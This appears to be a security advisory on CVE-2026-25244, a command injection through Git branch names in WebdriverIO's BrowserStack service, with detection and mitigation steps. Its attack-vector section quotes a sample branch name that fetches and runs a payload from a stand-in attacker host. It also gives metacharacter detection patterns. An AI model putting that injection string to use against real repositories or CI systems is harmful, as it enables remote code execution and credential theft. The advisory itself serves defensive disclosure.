CVE-2026-25244 Overview
CVE-2026-25244 is a command injection vulnerability [CWE-78] in WebdriverIO, a test automation framework used for unit, end-to-end, and component testing with WebDriver, WebDriver BiDi, and Appium. Versions below 9.24.0 of the wdio-browserstack-service package interpolate Git branch names directly into execSync() calls without sanitization. Attackers can supply a malicious repository whose branch name contains shell metacharacters, triggering arbitrary command execution during test orchestration. Exploitation enables remote code execution (RCE) on CI/CD servers and developer workstations. The maintainers fixed the issue in version 9.24.0.
Critical Impact
Attackers can achieve remote code execution on CI/CD pipelines and developer machines, enabling credential theft, source code exfiltration, SSH key disclosure, and supply chain compromise through tampered build artifacts.
Affected Products
- WebdriverIO wdio-browserstack-service versions below 9.24.0
- Node.js environments consuming the OpenJS Foundation webdriverio package
- CI/CD pipelines and developer workstations running affected WebdriverIO versions
Discovery Timeline
- 2026-05-18 - CVE-2026-25244 published to NVD
- 2026-05-19 - Last updated in NVD database
Technical Details for CVE-2026-25244
Vulnerability Analysis
The vulnerability resides in the getGitMetadataForAISelection() helper function within packages/wdio-browserstack-service/src/testorchestration/helpers.ts. The function retrieves Git metadata, including the current branch name, and embeds the value directly into a shell command executed via execSync(). Because Git permits branch names containing shell metacharacters such as backticks, semicolons, and dollar-sign command substitution, any branch name reaching this code path is treated as executable shell input.
When a WebdriverIO test run loads a repository configured through testOrchestrationOptions.runSmartSelection.source, or falls back to the current working directory, the framework reads the branch name from that repository. A branch name crafted to inject shell syntax executes attacker-controlled commands with the privileges of the test runner.
Root Cause
The root cause is missing input sanitization on Git-derived strings before passing them to a shell-interpreted execution function. The implementation relied on Git metadata being trusted text, but Git's permissive branch-name validation allows characters that the shell interprets as command separators or substitutions. This maps directly to CWE-78, OS Command Injection.
Attack Vector
An attacker hosts or contributes a repository containing a branch with a malicious name, for example a name embedding $(curl attacker.example/payload | sh). When a developer or CI system runs WebdriverIO with smart selection enabled against that repository, getGitMetadataForAISelection() interpolates the branch name into the shell command. The shell evaluates the injected payload before completing the intended Git operation, yielding code execution in the test runner's context. No authentication or user interaction beyond running the test suite is required.
No verified public exploit code is available. Refer to the GitHub Security Advisory GHSA-5c46-x3qw-q7j7 and the vulnerable helper source for the affected code path.
Detection Methods for CVE-2026-25244
Indicators of Compromise
- Unexpected child processes spawned by the node process running WebdriverIO, such as sh, bash, curl, or wget, particularly ones making outbound connections during test runs
- Outbound network connections from CI runners to unknown hosts during the test orchestration phase
- Git repositories containing branch names with shell metacharacters such as `, $(, ;, &&, or |
- Access to ~/.ssh/, .npmrc, environment variable dumps, or CI secret files from test processes
Detection Strategies
- Inventory package.json and lockfiles across repositories for webdriverio or @wdio/browserstack-service versions below 9.24.0
- Audit Git histories for branch names containing shell metacharacters using git for-each-ref --format='%(refname)'
- Monitor process trees on CI/CD agents for shell processes whose parent is the Node.js test runner
Monitoring Recommendations
- Alert on egress traffic from build agents to non-allowlisted destinations during WebdriverIO test execution
- Log and review all execSync and child_process invocations originating from test orchestration tooling
- Track access to credential stores, cloud metadata endpoints, and SSH key paths from test runner processes
How to Mitigate CVE-2026-25244
Immediate Actions Required
- Upgrade WebdriverIO and @wdio/browserstack-service to version 9.24.0 or later across all projects and CI pipelines
- Rotate any secrets, API tokens, and SSH keys accessible to CI runners or developer workstations that executed vulnerable versions against untrusted repositories
- Audit recent test runs for anomalous child processes or outbound connections and treat confirmed exploitation as a full system compromise
Patch Information
The maintainers fixed CVE-2026-25244 in WebdriverIO version 9.24.0. See the GitHub WebdriverIO Release v9.24.0 for release notes and the GitHub Security Advisory GHSA-5c46-x3qw-q7j7 for advisory details. The fix sanitizes Git-derived metadata before passing it to shell execution.
Workarounds
- Disable testOrchestrationOptions.runSmartSelection in WebdriverIO configuration until upgrading
- Restrict test runs to trusted repositories and avoid executing WebdriverIO against attacker-influenced branches
- Run CI test jobs in ephemeral, network-restricted containers with least-privilege credentials to limit blast radius
# Upgrade WebdriverIO and the BrowserStack service to the patched version
npm install webdriverio@^9.24.0 @wdio/browserstack-service@^9.24.0 --save-dev
# Verify the installed versions of both packages
npm ls webdriverio @wdio/browserstack-service
# Audit local and remote-tracking branch names for shell metacharacters
# (backtick, $, ;, &, |, and parentheses); no output means none were found
git for-each-ref --format='%(refname:short)' refs/heads/ refs/remotes/ | grep -E '[$`;&|()]'
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.